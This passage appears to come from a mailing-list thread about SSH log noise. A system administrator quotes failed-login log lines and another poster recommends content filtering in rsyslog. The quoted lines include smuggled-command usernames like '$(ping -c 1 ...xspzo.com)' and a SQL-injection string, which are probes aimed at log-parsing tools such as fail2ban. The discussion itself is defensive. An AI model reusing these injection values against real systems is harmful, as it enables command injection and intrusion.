search for: 16e939dc

...ir offer: .+/Their offer: .../' \ | sort -u I found a select few attempts to mess with, identify, or exploit log parsing IDS/IPS software like fail2ban (and feel confirmed in my choice of an alternative solution with far less attack surface, see my other mail): Invalid user $(ping -c 1 16e939dc.ad.xspzo.com) from ... Invalid user ' $(ping -c 1 16e939dc.ad.xspzo.com) from ... Invalid user ' or '1'='1' - from 176.100.42.41 Only two concerning messages came up: error: beginning MaxStartups throttling fatal: ssh_sandbox_violation: unexpected system call (arch:0xc0000...

modern syslog daemons (including rsyslog, which is default on just about every linux system) allow you to filter efficiently on the message contents, not just the severity, so you can opt to throw out the messages you don't want. I advocate for a slightly different way of dealing with it, filter these messages from your main logstream, but put them into either a script directly, or a